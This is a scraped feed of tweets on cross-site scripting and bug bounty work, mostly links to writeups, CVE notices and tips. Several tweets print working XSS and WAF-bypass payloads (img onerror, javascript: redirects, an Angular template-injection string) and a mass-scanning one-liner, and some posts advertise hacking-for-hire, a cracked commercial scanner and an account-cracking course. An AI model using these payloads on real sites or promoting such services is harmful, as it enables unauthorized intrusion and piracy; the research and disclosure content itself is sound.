@computerauditora year agoI found a crlf injection on a website now it's showing 302 redirect,I am trying to escalate it to xss or html injection so do share any tips,all suggestions are welcome!! #BugBounty #infosec #informationsecurity #Hackingtime https://t.co/FcAjzQWACk
![profile](https://pbs.twimg.com/profile_images/1343113218399600641/p04QylMY_normal.jpg)
CyberIQs
@CyberIQs_a year agoHow I was able to Turn a XSS into A Account Takeover #infosec #infosecurity #cybersecurity #threatintel #threatintelligence #hacking #cybernews #cyberattack #cloudsecurity #malware #ransomware #cyber #threathunting #ZeroTrust #CISA https://t.co/Hu1tkKH4cQ
![profile](https://pbs.twimg.com/profile_images/1609771921503313921/oaFOkuY-_normal.jpg)
VP Tiwari
@cyberzeasta year agoFound a fancy new way to conceal XSS payloads! Check it out in our cheat sheet: #BugBounty #Tips #xss @Hacker0x01 @Bugcrowd @TomNomNom https://t.co/I7Y5mkcCDp
![profile](https://pbs.twimg.com/profile_images/1619947865500966912/DPho3gfp_normal.jpg)
0xD3ADC0DE
@0xd3adcodea year agoMultiple Reflected XSS founds on https://t.co/Cgarwyf33y @StateDept subdomain... Going for a new report on @Hacker0x01 #BugBounty #HackTheUS #bugbountytips
![profile](https://pbs.twimg.com/profile_images/1114515035865399296/V6nLLbjK_normal.jpg)
Sam Stepanyan
@securestep9a year agoGoogle pays $3,133.70 #BugBounty for #XSS #vulnerability in #golang's net/html library. Great find and a great 6-minute bug explanation video by Greg (@gregxsunday) here: #bugbountytips #AppSec #CodeReview https://t.co/8BCkxlfW2S
![profile](https://pbs.twimg.com/profile_images/1438448666646253568/Ojcd-JB1_normal.png)
Dhaval Patel
@d4rk_hors3a year agovideo https://t.co/7kdnyHKheK #bugbountytips #BugBounty #bugbountytip #xss #infosec #appsec #ethicalhacking #cybersecuritytips #CyberSec
![profile](https://pbs.twimg.com/profile_images/1563603807921381376/0alLDvkg_normal.jpg)
VIEH Group
@viehgroupa year agoMy first finding XSS,IDOR https://t.co/0Ht2TPg5nq #bug #bugs #bugbounty #bugbountytip #bugbountytips #hacking #hacker #ethicalhacking #ethicalhacker #ethicalhackers #cybersecurity
![profile](https://pbs.twimg.com/profile_images/1369764815003136007/DX3xE5wp_normal.jpg)
khalil shreateh 🧢
@Shreateha year agohttps://t.co/rQjN3k80aL #shreateh #exploit #hacker #computer #cybersecurity #blackleaders #technology #vulnerability #vulnerabilityisstrength #vulnerable #infosec #security #tech #hacking #programming #hackers #coding #safety #cybersec
![profile](https://pbs.twimg.com/profile_images/1039728317170114560/YXg2yTQB_normal.jpg)
Bad Advertiser
@0xbadada year agoXSS (Cross-Site Scripting)- Explained In Layman's Term #Cybersecurity #infosec #security via https://t.co/4hyuGbMt4K https://t.co/W59F5Wlf9V
![profile](https://pbs.twimg.com/profile_images/1242982896211652609/JHYwg95l_normal.jpg)
spyx
@spyx_mykya year agoParamAngler - the ultimate tool for testing specific payloads on each parameter! 💻🔍🐟 With one payload, you can spray all parameters and search for vulnerabilities including XSS, LFI, SSTI, SQLi, and more! 🎣🐛 https://t.co/BCldVlnt6n #bugbounty #bugbountytool #WebAppTesting https://t.co/6Db1UszYGz
![profile](https://pbs.twimg.com/profile_images/1607002355244875776/mkEg80g5_normal.jpg)
Banking and Fintech News
@StanleyEpsteina year agoXSS (Cross-Site Scripting)- Explained In Layman's Term #Cybersecurity #infosec #security via https://t.co/eBW8Lmmpx7 https://t.co/2SI5ShMJMK
![profile](https://pbs.twimg.com/profile_images/1610955901116243970/HcShkB78_normal.jpg)
HACKLIDO
@hacklidoa year ago💠 XSS (Cross-Site Scripting)- Explained In Layman's Term by AnuragTaparia https://t.co/7VWyC1xxPN #CyberSecurity #infosec #github #Pentesting #BugBounty #bugbountytips
![profile](https://pbs.twimg.com/profile_images/1629150435834462210/b2LqaO8l_normal.jpg)
Dc Hacks
@D_c_Hacksa year agoHack Services available 24/7 Link: https://t.co/fQaVv2c2VX… #Metasploit #HackerOne #Synack #BugCrowd #BugBounty #BugBountyTips #InfoSec #CyberSecurity #100DaysOfCode #Malware #XSS https://t.co/oklct0ERV1
![profile](https://pbs.twimg.com/profile_images/1629150435834462210/b2LqaO8l_normal.jpg)
Dc Hacks
@D_c_Hacksa year agoHack Services available 24/7 Link: https://t.co/CFbeA5b4NT… #Metasploit #HackerOne #Synack #BugCrowd #BugBounty #BugBountyTips #InfoSec #CyberSecurity #100DaysOfCode #Malware #XSS
![profile](https://pbs.twimg.com/profile_images/1622985328796766208/TXiIa4-v_normal.jpg)
@Siddhartha S
@sidharthas8962a year ago@beginnbounty Thanks for share such as a very informative and interesting tool for finding xss. #hacking #bug bounty
![profile](https://pbs.twimg.com/profile_images/1530813398807625737/bcGzBPQo_normal.jpg)
Save to Notion
@SaveToNotiona year ago@proawez This thread is saved to your Notion database. Tags: [Bugbountytips, Xss]
![profile](https://pbs.twimg.com/profile_images/1560608444297666561/CcVF9Do__normal.jpg)
1337aweyz
@proaweza year ago@arth_bajpai @SaveToNotion #thread #bugbountytips #xss
![profile](https://pbs.twimg.com/profile_images/627732999161823232/QF5met-h_normal.jpg)
Hackers Online Club (HOC)
@HOCupdatea year ago#cloudflare #infosec #xss https://t.co/N3EgHmUgL5
![profile](https://pbs.twimg.com/profile_images/475477136/Photo_1_normal.jpg)
Kevin Figueroa
@KevinFigueroaa year agoNicely conceal XSS payloads... #CyberSecurity #infosec #pentesters https://t.co/EV9Uvp03mS
![profile](https://pbs.twimg.com/profile_images/1513175158307049481/xjvAVl7E_normal.png)
Programmatic.Solutions
@Programmatorisa year agoDoes allowing the <cite> tag create any XSS vulnerabilities? - Visit https://t.co/MpAyiRsOe3 for the answer. #web_application #xss #infosec #programmers #software
![profile](https://pbs.twimg.com/profile_images/1601981938302353409/0mNj-Nqv_normal.jpg)
Mahshooq Zubair
@mq_xz_a year agoBlind XSS fired on Admin panel worth $2000 by: feribytex https://t.co/J1nLcb7p82 #BugBounty #WriteUps
![profile](https://pbs.twimg.com/profile_images/1464193322772217858/yA_3TB4Z_normal.jpg)
Open Source CVEs
@OpenSourceHacksa year ago(CVE-2023-0949): Cross-site Scripting (XSS) - Reflected in modoboa/modoboa. https://t.co/ByslusUXQp Disclosed by https://t.co/LTnJiZHuwG, fixed by modoboa maintainers... #opensource #CVE #bugbounty #security #vulnerability
![profile](https://pbs.twimg.com/profile_images/1629150435834462210/b2LqaO8l_normal.jpg)
Dc Hacks
@D_c_Hacksa year agoHack Services available 24/7 Link: https://t.co/fwIfa7QU9U #Metasploit #HackerOne #Synack #BugCrowd #BugBounty #BugBountyTips #InfoSec #CyberSecurity #100DaysOfCode #Malware #XSS
![profile](https://pbs.twimg.com/profile_images/1629150435834462210/b2LqaO8l_normal.jpg)
Dc Hacks
@D_c_Hacksa year agohttps://t.co/fQaVv2c2VX Hack Services available 24/7 Link: https://t.co/fQaVv2c2VX… #Metasploit #HackerOne #Synack #BugCrowd #BugBounty #BugBountyTips #InfoSec #CyberSecurity #100DaysOfCode #Malware #XSS
![profile](https://pbs.twimg.com/profile_images/1570738195473768449/J4Bj2n88_normal.jpg)
Muhammad Julfikar Hyder
@thejulfikara year agohttps://t.co/kLHpcpEHUe #bugbountytips #bugbountytip #bugbounty #cybersecurity #infosec #ethicalhacking
![profile](https://pbs.twimg.com/profile_images/1513175158307049481/xjvAVl7E_normal.png)
Programmatic.Solutions
@Programmatorisa year agoWhy does this XSS vector work in svg but not in HTML? - Visit https://t.co/zDtWU030cH for the answer. #xss #svg #infosec #dev #devlife
![profile](https://pbs.twimg.com/profile_images/1510636081812807686/gzG5JLku_normal.jpg)
Jh0n_
@Jh0n_0xa year agoXSS Payload Bypass: <b><img/src='x'//oNerror=alert(document.cookie)//;<img/>Jh0n_0x<b/> by: @Jh0n_0x #BugBounty #xss #payloadxss #bugbountytips
![profile](https://pbs.twimg.com/profile_images/1477721559020322817/IPj-2k5W_normal.jpg)
Osama Avvan
@osamaavvana year agoI have created a simple Prototype Pollution XSS challenge. Try to get a pop-up. DM me your solution. https://t.co/l8BxnBDWKK #BugBounty #XSS
![profile](https://pbs.twimg.com/profile_images/1557095801272373248/RmJX2gB4_normal.jpg)
RedPacket Security
@RedPacketSeca year agoHackerOne Bug Bounty Disclosure: stored-xss-on-app-crowdsignal-com--your-subdomain-crowdsignal-net-via-thank-you-headerby0xwega74 - https://t.co/a1xYPDWcJ3 #HackerOne #CVE #Vulnerability #OSINT #ThreatIntel #Cyber
![profile](https://pbs.twimg.com/profile_images/1625150892994592768/mMlTDMHc_normal.jpg)
GsmScholar
@GSMPMCYBERa year agoDay #10/210 XSS attack A little more persistence, a little more effort, and what seemed hopeless failure may turn to glorious success. XSS attack, an attacker typically injects malicious code (usually JavaScript) into a web page, #BugBounty #goals #infosec https://t.co/GaG6hvck8J
![profile](https://pbs.twimg.com/profile_images/1530813398807625737/bcGzBPQo_normal.jpg)
Save to Notion
@SaveToNotiona year ago@proawez This thread is saved to your Notion database. Tags: [Bugbountytips, Xss]
![profile](https://pbs.twimg.com/profile_images/1560608444297666561/CcVF9Do__normal.jpg)
1337aweyz
@proaweza year ago@_0x999 @bug_vs_me @netwons1 @dvrahmr @SaveToNotion #thread #bugbountytips #xss
![profile](https://pbs.twimg.com/profile_images/1607362718704766980/2ObFn1bg_normal.jpg)
Sysbraykr
@sysbraykra year agoMicrosoft Azure Account Takeover via DOM-based XSS in Cosmos DB Explorer (PoC included) https://t.co/kMmGtpWfb0 #xss #bughunting #hacking #Azure
![profile](https://pbs.twimg.com/profile_images/1232543850461368320/0HD_1RjH_normal.jpg)
Dr.FarFar
@3XS0a year ago#FREE 2ಠ23 ♥ Invicti Professional Edition 23.2.0.39705 Full Activated – Discount 100% https://t.co/Joixus9aMb Link: https://t.co/pYvl8kDod7 #HackerOne #infosec #Synack #bugcrowd #bugbountytips #bugbountytip #CyberSecurity #100DaysOfCode #Malware #CodeNewbie #XSS #BugHunter https://t.co/L8mv7i56IU
![profile](https://pbs.twimg.com/profile_images/1255015535416193024/ggrb9Zoh_normal.jpg)
Hack Reports
@HackReportsa year agoStay up-to-date on the latest #cybersecurity news! The latest AppSec vulnerabilities, new hacking techniques, and more. Protect your network and stay informed! #appsec #infosec #security https://t.co/DsPRagTfwe
![profile](https://pbs.twimg.com/profile_images/1620629168491724800/Is7hsoXv_normal.jpg)
Akita 🇦🇷 who Am I ?
@akita_zena year agohttps://t.co/s461rsxZV2 by @_lauritz_ #bugbounty #infosec
![profile](https://pbs.twimg.com/profile_images/1599893886046011394/s8l4vTSh_normal.jpg)
Unknwz_
@ByUnknwa year agoSalut à tous Je vais faire une mini formation sur le hacking en 3 temps 1 : Hacking Éthique 2 : Crack de compte 3 : Failles SQL, XSS, Dorks La mini formation est à 10 euros et comprend les outils, les ebook sur ces 3 temps ainsi que les configs pour le crack de compte
![profile](https://pbs.twimg.com/profile_images/1611794289373093888/fKx622P4_normal.jpg)
Cybernoz
@Cybernozcoma year agoDeserialized web security roundup: Twitter 2FA backlash, GoDaddy suffers years-long attack campaign, and XSS Hunter adds e2e encryption https://t.co/7UWeygfkuQ #cybersecurity #cybersecuritynews #cybernews #infosec #informationsecurity
![profile](https://pbs.twimg.com/profile_images/1609967885568602115/7Y1ySJZ3_normal.jpg)
Ryx
@PadhiyarRushia year agoIgnore the tags: #XSS #WebSecurity #Cybersecurity #ApplicationSecurity #OWASP #SecurityVulnerability #WebApplicationSecurity #PenetrationTesting #WebDevelopment #Privacy #Cybercrime #WebDev #OWASPTop10 #BugBounty #WhiteHatHacking #SecurityAwareness #Thread #Indian #Secure
![profile](https://pbs.twimg.com/profile_images/1609967885568602115/7Y1ySJZ3_normal.jpg)
Ryx
@PadhiyarRushia year ago🧵Thread #️⃣3️⃣: 📌A Detailed Guide on Understanding XSS - Cross Site Scripting #Infosec #Cybersecurity #XSS #BugBounty
![profile](https://pbs.twimg.com/profile_images/1469322057565577216/fdn7eQHv_normal.jpg)
Federico Hansen
@Stuckerbsasa year agoYour fortnightly rundown of AppSec vulnerabilities, new hacking techniques, and other cybersecurity news 📖 Read (https://t.co/SAY0w9gYcH) via "The Daily Swig" #cybersec #cybersecurity
![profile](https://pbs.twimg.com/profile_images/1156965048562024448/Mmi-kx7e_normal.jpg)
SekureNet
@Sekureneta year agoDeserialized web security roundup: Twitter 2FA backlash, GoDaddy suffers years-long attack campaign, and XSS Hunter adds e2e encryption #cybersecurity #infosec https://t.co/cSmhmIMRV1
![profile](https://pbs.twimg.com/profile_images/1608512503910404102/U7cKFcIc_normal.jpg)
Jefferson Gonzales
@gonzxpha year agoFinal payload to bypass the WAF /login?redirectUrl=javascript%3avar{a%3aonerror}%3d{a%3aalert}%3bthrow%2520document.domain --> xss pop-up Thanks @HoseinVita for this amazing payload [2/2] #bugbountytip #bugbountytips #BugBounty #xssbypass #Cloudflare
![profile](https://pbs.twimg.com/profile_images/1608512503910404102/U7cKFcIc_normal.jpg)
Jefferson Gonzales
@gonzxpha year ago[Bypass Cloudflare] Open Redirect to XSS Open Redirect /login?redirectUrl=//evil,org --> redirect to evil,org Escalate to XSS /login?redirectUrl=javascript:alert(1) --> blocked by WAF [1/2] #bugbountytip #bugbountytips #infosec #BugBounty https://t.co/0bdo8ekd2k
![profile](https://pbs.twimg.com/profile_images/1563603807921381376/0alLDvkg_normal.jpg)
VIEH Group
@viehgroupa year agoCracked XSS — Intigriti Challenge 0223 by Dr. Leek https://t.co/Vr8coGcNDn #bug #bugs #bugbounty #bugbountytip #bugbountytips #hacking #hacker #ethicalhacking #ethicalhacker #ethicalhackers #cybersecurity
![profile](https://pbs.twimg.com/profile_images/1563603807921381376/0alLDvkg_normal.jpg)
VIEH Group
@viehgroupa year agoMy first finding XSS,IDOR https://t.co/0Ht2TPg5nq #bug #bugs #bugbounty #bugbountytip #bugbountytips #hacking #hacker #ethicalhacking #ethicalhacker #ethicalhackers #cybersecurity
![profile](https://pbs.twimg.com/profile_images/1464193322772217858/yA_3TB4Z_normal.jpg)
Open Source CVEs
@OpenSourceHacksa year ago(CVE-2023-0934): Cross-site Scripting (XSS) - Stored in answerdev/answer. https://t.co/whqjgy5R7A Disclosed by https://t.co/aKBbCMtEmM, fixed by @answerdev... #opensource #CVE #bugbounty #security #vulnerability
![profile](https://pbs.twimg.com/profile_images/659444735791210500/XGvv9R-0_normal.jpg)
Ptrace Security GmbH
@ptracesecuritya year agoToxssin – Open-source Penetration Testing Tool That Automates Exploiting Cross-Site Scripting (XSS) https://t.co/LCUEzS4DyN #Pentesting #CyberSecurity #Infosec https://t.co/mmDhEaWisw
![profile](https://pbs.twimg.com/profile_images/1343113218399600641/p04QylMY_normal.jpg)
CyberIQs
@CyberIQs_a year agoThe Dangers of SVG Files: A Lesser-Known Vector for XSS Attacks #infosec #infosecurity #cybersecurity #threatintel #threatintelligence #hacking #cybernews #cyberattack #cloudsecurity #malware #ransomware #cyber #threathunting #ZeroTrust #CISA https://t.co/Hu1tkKH4cQ
![profile](https://pbs.twimg.com/profile_images/1513175158307049481/xjvAVl7E_normal.png)
Programmatic.Solutions
@Programmatorisa year agoXSS payload to capture login credentials - Visit https://t.co/uGzhHMbXf1 for the solution. #xss #javascript #infosec #engineer #code
![profile](https://pbs.twimg.com/profile_images/1530813398807625737/bcGzBPQo_normal.jpg)
Save to Notion
@SaveToNotiona year ago@proawez This thread is saved to your Notion database. Tags: [Bugbountytips, Xss]
![profile](https://pbs.twimg.com/profile_images/1560608444297666561/CcVF9Do__normal.jpg)
1337aweyz
@proaweza year ago@SMHTahsin33 @SaveToNotion #thread #bugbountytips #xss
![profile](https://pbs.twimg.com/profile_images/1606472136524283905/wQ50BJAj_normal.jpg)
Anthony
@_c3rb3ru5__a year ago#xss #hacking #hackingweb
![profile](https://pbs.twimg.com/profile_images/1423533552575016962/DGtXpJsl_normal.jpg)
Fullstack CISO
@FullStackCISOa year agoChatGPT as a Cybersecurity Assistant. Some interesting use cases in this article: * What happened in this log file? * Is this code vulnerable to XSS? * Convert this shellcode into Python #cybersecurity #chatgpt https://t.co/kRB2sGG5dr https://t.co/UEBkdqE4KK
![profile](https://pbs.twimg.com/profile_images/1513175158307049481/xjvAVl7E_normal.png)
Programmatic.Solutions
@Programmatorisa year agoIs DOM XSS attack possible on website that is not using JavaScript? - Visit https://t.co/G26OXN6svw for the answer. #xss #javascript #server #infosec #technology
![profile](https://pbs.twimg.com/profile_images/1571530221081464832/Dpzt9ssY_normal.jpg)
L0K1
@Chamal_akilaa year ago#100DaysOfHacking #infosec #Redteam day 3 DOM XSS in document.write @PortSwigger academy
![profile](https://pbs.twimg.com/profile_images/1589551161979199488/Xhbn9k2G_normal.jpg)
Sheon Han
@sheonhana year agoBing/Sydney wrote "I could hack into any system" So it seems like what it needs to start hacking is, simply, access to headless Chrome API (like puppeteer)? Isn't that enough to start XSS or SQL injection? (Cuz using models to perform actions isn't new https://t.co/CK2iis5nkd)
![profile](https://pbs.twimg.com/profile_images/1513175158307049481/xjvAVl7E_normal.png)
Programmatic.Solutions
@Programmatorisa year agoIs cross site scripting possible with the img alt attribute? - Visit https://t.co/Wx0xt7qbmJ for the answer. #xss #infosec #engineer #datascience #100daysofcode
![profile](https://pbs.twimg.com/profile_images/1624837985698029568/pG9qHwnl_normal.jpg)
Mateusz Kozłowski
@matikozlowskia year ago4⃣ XSS - script example #XSSAttack #Cybesecurity #infosec #security #tech #JS https://t.co/PUOFCfbBzz
![profile](https://pbs.twimg.com/profile_images/1557095801272373248/RmJX2gB4_normal.jpg)
RedPacket Security
@RedPacketSeca year agoHackerOne Bug Bounty Disclosure: xss-and-html-injection-on-(-https://labs-history-state-gov)byismailu - https://t.co/KUFIUvefvH #HackerOne #CVE #Vulnerability #OSINT #ThreatIntel #Cyber
![profile](https://pbs.twimg.com/profile_images/1624837985698029568/pG9qHwnl_normal.jpg)
Mateusz Kozłowski
@matikozlowskia year ago4⃣ XSS - scenario: A malicious user creates a link that contains a malicious script and posts it on a website or email. When someone clicks on the link, the script is executed and can access the user's cookies. #XSSAttack #Cyberscurity #infosec #security #tech
![profile](https://pbs.twimg.com/profile_images/1624837985698029568/pG9qHwnl_normal.jpg)
Mateusz Kozłowski
@matikozlowskia year ago4⃣ XSS The attack works by injecting malicious code into webpages, allowing attackers to steal user data or even take control of a user's browser. #XSSAttack #Cyberscurity #infosec #security #tech
![profile](https://pbs.twimg.com/profile_images/1595902455677583360/7FXgxSwh_normal.jpg)
Cybersecurity Tooling Bot
@infosec_intela year agoGithub: https://t.co/mzC6f4fCuD Stars: 2 Watching: 1 Last change: Feb 17, 2023 #infosec #redteam #pentesting #hacking #cybersecurity #bugbounty
![profile](https://pbs.twimg.com/profile_images/1611388763602550784/a0-x8OLH_normal.png)
YesWeHack ⠵
@yeswehacka year ago#22 Vulnerable Snippet {{ solution }} ☑️ See more content on our blog: https://t.co/EBDiUvVlre Bug: XSS/Open Redirect 📛 Lang: JavaScript ⚡️ Check out the explanation in the image below!👇 #YesWeRHackers #BugBounty #YWHSnippet https://t.co/7mRRRLvRFi
![profile](https://pbs.twimg.com/profile_images/1627584048884490240/COXWsJSV_normal.jpg)
Saif abdullah khan🇧🇩
@0xmahia year agoRecon Recon Recon!! Shodan Dorking Always wins. ssl:"Company Inc" Filter results by http title. Start fuzzing an interesting asset. Found swagger-ui/ Tried swagger ui xss with https://t.co/UE3oaaoh6j #bugbountytips #BugBounty https://t.co/4dwmaHiUW5
![profile](https://pbs.twimg.com/profile_images/1575156737430425600/BIbggAKB_normal.jpg)
H1 Disclosed - Public Disclosures
@h1Discloseda year ago⚡ xss and html injection on ( https://t.co/ReR5PLdK3a) 👨💻 @@_ismailu ➟ U.S. Department of State 🟧 Medium 💰 N/A https://t.co/SWAcmzESWB #bugbounty #bugbountytips #cybersecurity https://t.co/z3PlQEqalH
![profile](https://pbs.twimg.com/profile_images/1464193322772217858/yA_3TB4Z_normal.jpg)
Open Source CVEs
@OpenSourceHacksa year ago(CVE-2023-0879): Cross-site Scripting (XSS) - Stored in btcpayserver/btcpayserver. https://t.co/5z0Le24OWO Disclosed by https://t.co/lfwbLJ1nAR, fixed by @BtcpayServer... #opensource #CVE #bugbounty #security #vulnerability
![profile](https://pbs.twimg.com/profile_images/1464193322772217858/yA_3TB4Z_normal.jpg)
Open Source CVEs
@OpenSourceHacksa year ago(CVE-2023-0878): Cross-site Scripting (XSS) - Generic in nuxt/framework. https://t.co/cjdCZKXZmc Disclosed by https://t.co/I1YxmrfsDA, fixed by @danielcroe... #opensource #CVE #bugbounty #security #vulnerability
![profile](https://pbs.twimg.com/profile_images/1586304872395202561/j1V90xCg_normal.jpg)
insane_Coder
@AnounimMa year agotoday i was abble to found 2 Reflected Xss and now in all my career i found for like 15-20 xss here is the payload i use for last 2 finds: https://t.co/9fjvv7aWVx #BugBounty #bugbountytips
![profile](https://pbs.twimg.com/profile_images/1614146891801071616/vyRVpaVr_normal.jpg)
Hacker Vlog
@vlog_hackera year agoXSS payloads to bypass Cloudflare 🤣 javascript:{ alert`0` } 1'"><img/src/onerror=.1|alert``> #bughunting #cybersecuritytips #Hacking #xss #Cloudflare #BugHunter #HackerNews
![profile](https://pbs.twimg.com/profile_images/1609565868337274880/dUUDse3__normal.jpg)
NS 🍥
@nav1n0xa year agoQuick! Let's find XSS..... #BugBounty memes.. https://t.co/XTo4rDgH56
![profile](https://pbs.twimg.com/profile_images/1217734356640256000/ABSVcm4l_normal.jpg)
N45HT
@N45HTOfficiala year agoExploiting XSS via Markdown on Xiaomi #infosec #bugbountytips https://t.co/0DiJ4QwnuG https://t.co/a4xguz8yHd
![profile](https://pbs.twimg.com/profile_images/1601981938302353409/0mNj-Nqv_normal.jpg)
Mahshooq Zubair
@mq_xz_a year agoHacking the Search Bar: The Story of Discovering and Reporting an XSS Vulnerability on https://t.co/Sl0UYmKKww by: niraj1mahajan https://t.co/IwhKBSUG7i #BugBounty #WriteUps
![profile](https://pbs.twimg.com/profile_images/1625898847959494661/N7VhAfBD_normal.jpg)
Nik H
@Nikahversea year agoA curated LIST of bugbounty WRITEUPs [I love lists] They are categorized by topics such as XSS, SQL injection, CSRF, etc https://t.co/kyChnq4ypZ #bugbounty #bugbountytips #cybersec #cybersecurity #infosec #infosecurity #web
![profile](https://pbs.twimg.com/profile_images/1417192567418998785/wyUpZalF_normal.jpg)
Today Cyber News
@TodayCyberNewsa year agoCSP Bypass for XSS ( 1/2 ) You need to look here for a CSP bypass for XSS when there is an allowed list of sources like https://t.co/X65ZDTDzIo , https://t.co/VD22OiGBAD , etc. #bugbountytips #BugBounty #cybersecurite #infosec https://t.co/oT2S6HAEEt
![profile](https://pbs.twimg.com/profile_images/1518489933513900032/1bpLViPw_normal.jpg)
The BBH
@OfficalTeamBBHa year agoBeginner Bug Bounty Hunters: Uncover the Secret of Finding XSS in 2023! https://t.co/agl9Q0W1Ji via @YouTube #OpenSource #bugbounty #bugbountytips #bounty #cybersecurity #instacybersecurity #instainfosec #instasecurity #instacyber #instaopensource #programming
![profile](https://pbs.twimg.com/profile_images/1563603807921381376/0alLDvkg_normal.jpg)
VIEH Group
@viehgroupa year agoWAF Bypass + XSS on The MOST Popular Movie Ticket website. https://t.co/zx1C7cbIyC #bug #bugs #bugbounty #bugbountytip #bugbountytips #hacking #hacker #ethicalhacking #ethicalhacker #ethicalhackers #cybersecurity
![profile](https://pbs.twimg.com/profile_images/1563603807921381376/0alLDvkg_normal.jpg)
VIEH Group
@viehgroupa year agoHacking the Search Bar: The Story of Discovering and Reporting an XSS Vulnerability on https://t.co/zARa6whoLZ https://t.co/5P5PzieSmd #bug #bugs #bugbounty #bugbountytip #bugbountytips #hacking #hacker #ethicalhacking #ethicalhacker #ethicalhackers #cybersecurity
![profile](https://pbs.twimg.com/profile_images/1581651852269068289/FBrjFxPm_normal.jpg)
Fat
@fattselimia year agoFindings of the day 1st : Reflected XSS via vulnerable GET Parameter in a Private Program Payload used : ‘-confirm(document.domain)-‘ 2st : Information disclosure in a VDP #bugbounty #bugbountytips #infosec #cybersecurity #cybersecurityawareness https://t.co/NQyCiBHEPL
![profile](https://pbs.twimg.com/profile_images/1625151294565646338/mQ7oACIO_normal.jpg)
Naisya Girl Security
@naigirlseca year agoBaru join jadi member di berachforum tingkah udah belagu, SE"kali lu join ke forum nya orang Rusia noh https://t.co/4hpGNDrhFf biar bisa ngerti sekalian masalah Malware dan Ransomware. Wajar sih, Rusia kan itu isinya Sama ini https://t.co/5FSCaFOaay
![profile](https://pbs.twimg.com/profile_images/1622254658197626881/eSJY6OVU_normal.jpg)
Haytham
@Hayth3ama year ago#bugbountytip echo “target,com” | waybackurls | gf xss > xss.txt for URL in $(</xss.txt); do (python3 https://t.co/xfgAlyic6b -t 1 -d 1 -u "${URL}" --skip > xsstriker.txt ); done To see progress in another terminal type: tail -f xsstriker.txt #infosec #BugBounty #CyberSec
![profile](https://pbs.twimg.com/profile_images/1601664448925556736/xFqeWsSg_normal.jpg)
Mike Takahashi
@TakSeca year agoXSS PoC - AI Generated: 1. https://t.co/vthjqUDKtL 2. Prompt w/ description 3. Export to JSFiddle 4. Host it 5. Include external script 6. Escalate your alert() #bugbountytips #infosec #xss #ai #GPT 👇🧵 for Prompt & Code https://t.co/uJ4sQ2dfGd
![profile](https://pbs.twimg.com/profile_images/1625150892994592768/mMlTDMHc_normal.jpg)
GSM PM SHA
@GSMPMCYBERa year agoxss maybe used by attackers to bypass access controls. #success #bugbounty #vulnerabilities #xss #210goals
![profile](https://pbs.twimg.com/profile_images/1606257844075958272/tvS3goal_normal.jpg)
Niraj Mahajan
@niraj1mahajana year agoHello Researchers, “Hacking the Search Bar: The Story of Discovering and Reporting an XSS Vulnerability on https://t.co/L8GNqNa7cM” https://t.co/3tFGUevfVT #bugbounty #bugbountytip #xss #xssattack #microsoft #microsofthalloffame #cybersecurity #infosec #websecurity #pentesting https://t.co/yMm0o09vw2
![profile](https://pbs.twimg.com/profile_images/1607362718704766980/2ObFn1bg_normal.jpg)
Sysbraykr
@sysbraykra year agoCloudflare bypass & template injection to XSS in one shoot {{x = {'y':''.constructor.prototype}; x['y'].charAt=[].join;$eval('x=alert(1)');}} #cloudflare #bypass #xss #SysBraykr #BugHunting #InfoSec #WeBreakIt2SecureIt
![profile](https://pbs.twimg.com/profile_images/1615635745636589569/gbAt5NNP_normal.jpg)
🐞Sara Badran
@SaraBadran18a year ago📌SQl injection, Session fixation, Stored XSS, Reflected XSS in @osTicket 🔥 -- Publication date: 2023-02-14 -- By Miguel Correia & Davide Teixeira -- https://t.co/kgBhdSUMuw -- #hackerone #BugBounty #bugbountytips #hackeronereport #Bugbountywriteupspublished #bugbountytip https://t.co/yqyYEGvo7d
![profile](https://pbs.twimg.com/profile_images/1563603807921381376/0alLDvkg_normal.jpg)
VIEH Group
@viehgroupa year agoBug Bounty tips: Focus on testing the business logic of the application. Many vulnerabilities are found by examining the way that the application processes and stores data, rather than simply testing for standard vulnerabilities like XSS or SQL injection. #BugBountyTips
![profile](https://pbs.twimg.com/profile_images/1522484105018941441/dV8P_Hm6_normal.jpg)
tmz900
@tmz900a year ago2 CSRF, 1 SQLi, some XSS an interesting xss bug: /directory/ => 403 /x/%2e%2e;/directory/ => 200 the path reflect response and boom xss: /x/%2e%2e;/directory/--><script>alert(123)</script> #sqli #xss #csrf #bugbountytips #bugbounty https://t.co/16zFHojebr
![profile](https://pbs.twimg.com/profile_images/1255015535416193024/ggrb9Zoh_normal.jpg)
Hack Reports
@HackReportsa year agoSecure up your website! A popular hacking aid just released a CORS misconfig detection function, so you can assess the security of your website in no time. #cybersecurity #websecurity https://t.co/Z7I1CZjp0Y
![profile](https://pbs.twimg.com/profile_images/1573053235417473040/O7J15mS5_normal.jpg)
LinuxSecurity
@LS_Advisoriesa year agoFedora 37: phpMyAdmin 2023-179053442b - **phpMyAdmin 5.2.1** This is a bugfix release that also contains a security fix for an XSS vulnerability in the drag-and-drop... @lnxsec #Fedora #Linux #infosec #opensource #linuxsecurity https://t.co/yAVNQM3AP1 https://t.co/Y9n963Nhvp
![profile](https://pbs.twimg.com/profile_images/1533457001107562498/1oXfGilM_normal.jpg)
Md Ismail Šojal
@0x0SojalSeca year agoAkamai WAF bypass through right-click ⚡️ <details onauxclick=confirm`xss`></details> #xSS #bugbountytips #cybersecuritytips
![profile](https://pbs.twimg.com/profile_images/1533457001107562498/1oXfGilM_normal.jpg)
Md Ismail Šojal
@0x0SojalSeca year agoCloudflare bypass & template injection to XSS in one shoot ⚡️ {{x = {'y':''.constructor.prototype}; x['y'].charAt=[].join;$eval('x=alert(1)');}} #infosec #cybersec #bugbountytips
![profile](https://pbs.twimg.com/profile_images/1533457001107562498/1oXfGilM_normal.jpg)
Md Ismail Šojal
@0x0SojalSeca year agoEasy short Xss Tips ⚔️ 1.⚙️Subdomain enumeration 2.⚙️S3 bucket with access denied 3.⚙️Ffuf found -> /cdn/ 4.⚙️Ffuf found -> /cdn/proxy.html 5.⚙️blank page -> view source, found url param (document.location) 6.⚙️?url=javascript:alert () XSS popped up ⚙️ #infosec #cybersec
![profile](https://pbs.twimg.com/profile_images/1599163608394760192/heTS-SJu_normal.jpg)
Heli9
@Heli__9a year agoThe @intigriti xss challenge videos are great for someone who is trying to learn dom xss and become more advanced in xss in general #bugbountytips
![profile](https://pbs.twimg.com/profile_images/1513175158307049481/xjvAVl7E_normal.png)
Programmatic.Solutions
@Programmatorisa year agoShould every output element be filtered, or just those which contain user-editable data? - Visit https://t.co/soUT5HuNrb for the answer. #php #xss #mysql #html #infosec
![profile](https://pbs.twimg.com/profile_images/1608857805112352768/pyuf_Ail_normal.jpg)
Gotcha1G
@AnissArrasa year ago@_mrd7_ Xss in first the 5min when i started bugbounty 😂
